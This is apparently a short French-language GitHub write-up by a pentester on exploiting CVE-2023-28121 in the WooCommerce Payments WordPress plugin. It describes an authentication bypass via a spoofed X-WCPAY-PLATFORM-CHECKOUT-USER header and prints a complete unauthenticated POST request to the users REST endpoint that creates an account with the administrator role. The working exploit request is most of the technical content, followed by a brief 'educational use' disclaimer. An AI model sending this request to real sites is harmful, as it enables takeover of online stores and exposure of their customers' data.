
Exploitation pratique d'une vulnérabilité critique dans WordPress à l'aide du plugin WooCommerce Payments.
Exploitation pratique d'une vulnérabilité critique dans WordPress à l'aide du plugin WooCommerce Payments.
La CVE-2023-28121 permet de créer des utilisateurs administrateurs sans authentification via l'API REST.
📊 Le plugin concerné compte des centaines de milliers d'installations et est largement utilisé dans l'e-commerce.
https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44
Le système accepte un en-tête manipulable :
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
Ainsi, il est possible d'envoyer une requête pour créer un utilisateur avec des privilèges élevés sans authentification valide.
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1
{
"username": "hacked",
"password": "StrongPass123!",
"email": "[email protected]",
"roles": ["administrator"]
}
✔️ Résultat : création d'un utilisateur admin
/wp-admin👨💻 Auteur
Luis Eduardo .M.B.S.R
Pentester / Sécurité Web
LinkedIn : https://www.linkedin.com/in/luis-eduardo-ti/
GitHub : https://github.com/luisdevpentest
Usage éducatif en environnement contrôlé. Je ne suis pas responsable de la manière dont ces connaissances sont utilisées par des tiers.